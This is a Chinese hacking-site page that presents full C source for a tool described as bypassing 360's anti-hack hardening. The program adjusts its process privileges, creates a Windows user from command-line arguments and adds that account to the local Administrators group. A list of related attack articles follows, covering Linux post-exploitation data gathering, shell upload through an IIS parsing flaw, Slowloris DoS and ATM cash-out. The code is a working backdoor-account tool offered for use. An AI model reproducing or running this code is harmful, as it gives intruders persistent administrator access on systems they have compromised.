突破360防黑加固添加用户
//Code by Pnig0s1992
//Date:2012,3,17
#include <stdio.h>
#include <Windows.h>
#include <lm.h>
#pragma comment(lib,"Netapi32.lib")
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);
BOOL ImprovePriv(LPWSTR name);
int main(INT argc,char * argv[])
{
BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);
if(argc < 3)
{
printf("\nCode by Pnig0s1992");
printf("\nUsage:");
printf("\n\t%s UserName Password",argv[0]);
printf("\n\tRemark:Default add to Group:Administrators.");
return -1;
}
if(bResult)
{
printf("Successfully promote priv!");
}else
{
printf("Failed promote priv.");
return -1;
}
int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);
wchar_t *wUserName =new wchar_t[Namesize+1];
if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize))
{
return false;
}
int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);
wchar_t *wPassword =new wchar_t[Passsize+1];
if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))
{
return false;
}
LPTSTR lpName = wUserName;
LPTSTR lpPassword = wPassword;
LPWSTR lpSevName = NULL;
LPWSTR lpGroupName = L"Administrators";
AddUser(lpName,lpPassword,lpSevName);
SetGroup(lpName,lpSevName,lpGroupName);
return 0;
}
BOOL ImprovePriv(LPWSTR name)
{
HANDLE hToken;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
{
printf("\nGet process token failed.(%d)",GetLastError());
return FALSE;
}
TOKEN_PRIVILEGES tkp;
tkp.PrivilegeCount = 1;
if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))
{
printf("\nLookup process priv failed.(%d)",GetLastError());
return FALSE;
}
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))
{
printf("\nAjust process priv failed.(%d)",GetLastError());
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)
{
USER_INFO_1 ui;
DWORD dwLevel = 1;
DWORD dwError = 0;
NET_API_STATUS nStatus;
ui.usri1_name = lpUsername;
ui.usri1_password = lpPassword;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);
if(nStatus == NERR_Success)
{
printf("\nAdd user:%S successfully!",lpUsername);
}else
{
printf("\nAdd user failed:%d.",nStatus);
}
return 0;
}
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)
{
NET_API_STATUS nStatus;
LOCALGROUP_MEMBERS_INFO_3 lgui;
lgui.lgrmi3_domainandname = lpUsername;
nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);
if(nStatus == NERR_Success)
{
printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);
}else if(nStatus == NERR_GroupNotFound)
{
printf("\nCan't find such a group:%S.",lpGroupName);
}else
{
printf("\nSet GROUP:%S failed.",lpGroupName);
}
return 0;
}
相关文章
史上最全Linux提权后获取敏感信息方法
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我...
iis7.5加fck解析漏洞后台拿shell
IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxo...
什么叫Wireshark?该专用工具是一个互联网排序解析器
什么叫Wireshark? 该专用工具是一个互联网排序解析器,这类专用工具将试着捕捉用以剖析,网络问题清除,文化教育,手机软件和通讯协议开发设计的互联网数据文件,并显示信息尽量详尽的获得的数据文件数...
sudopip3installPySocks
Slowloris DOS进攻也可称之为:Slowloris拒绝服务攻击进攻; 普遍的DDOS进攻有SYN flood、UDP flood、ICMP flood等。在其中SYN flo...
如何检测自己是否成为肉鸡_检测自己成为肉鸡的方法
如何检测自己是否成为肉鸡的方法,注意以下几种基本的情况: 1:QQ、MSN的异常登录提醒 (系统提示上一次的登录IP不符) 2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至...
网站渗透,教你让ATM机一直吐钱
去年夏天,一名土尔其中国公民Ercan Findikoglu被引渡回国到英国,而现阶段,他将遭遇着纽约市审判长明确提出的18项罪行控告。 土尔其近些...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!